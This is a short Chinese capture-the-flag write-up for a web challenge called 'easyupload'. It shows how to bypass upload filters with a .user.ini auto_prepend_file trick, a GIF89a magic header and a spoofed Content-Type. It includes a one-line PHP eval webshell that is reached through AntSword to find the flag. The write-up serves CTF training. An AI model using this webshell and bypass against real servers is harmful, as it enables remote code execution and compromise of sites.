攻防世界-WEB-easyupload

1.新建.user.ini文件,内容如下

GIF89a

auto_prepend_file=a.jpg

2.上传该文件,并用burp抓包,将Content-Type: application/octet-stream修改为

Content-Type: image/jpg

3.放包,结果如下

  1. 新建a.txt文件,内容为

GIF89a

<?=eval($_REQUEST['cmd']);?>

保存后将文件后缀修改为.jpg

5.直接上传该文件即可成功上传

PS:按F12打开调试器选择网络查看上传文件的地址

如图所示上传地址为:****/uploads/index.php

6.直接蚁剑连接

7.结果如下

8.查找flag

相关推荐
大龄门外汉14 天前
CPP学习之map和set
c++·笔记·学习·stl·set·map·改行学it
WiFi满格-_-2 个月前
软件警告弹窗与兼容性问题
经验分享·科技·学习·电脑·改行学it
剁椒豆腐脑3 个月前
阶段二JavaSE进阶阶段之设计模式&继承 2.2
java·设计模式·跳槽·学习方法·改行学it
GineLee3 个月前
吉林大学软件工程章节测试答案-第八章
经验分享·软件工程·运维开发·改行学it
蒙奇D索大3 个月前
【数据结构】图论实战:DAG空间压缩术——42%存储优化实战解析
数据结构·笔记·学习·考研·图论·改行学it
GineLee3 个月前
吉林大学计算机组成原理期末复习简答题整理
系统架构·硬件架构·改行学it
蒙奇D索大3 个月前
【11408学习记录】考研数学核心突破:矩阵本质、系统信息与向量空间基
笔记·学习·线性代数·考研·矩阵·改行学it
蒙奇D索大3 个月前
【11408学习记录】[特殊字符] 速解命题核心!考研数学线性代数:4类行列式满分技巧(含秒杀公式)
笔记·学习·线性代数·考研·改行学it
青钰未央3 个月前
23、Python字符串核心机制解析:驻留原理、对象比较与成员检测实战
python·改行学it
蒙奇D索大3 个月前
【11408学习记录】考研数学攻坚:行列式本质、性质与计算全突破
笔记·学习·线性代数·考研·机器学习·改行学it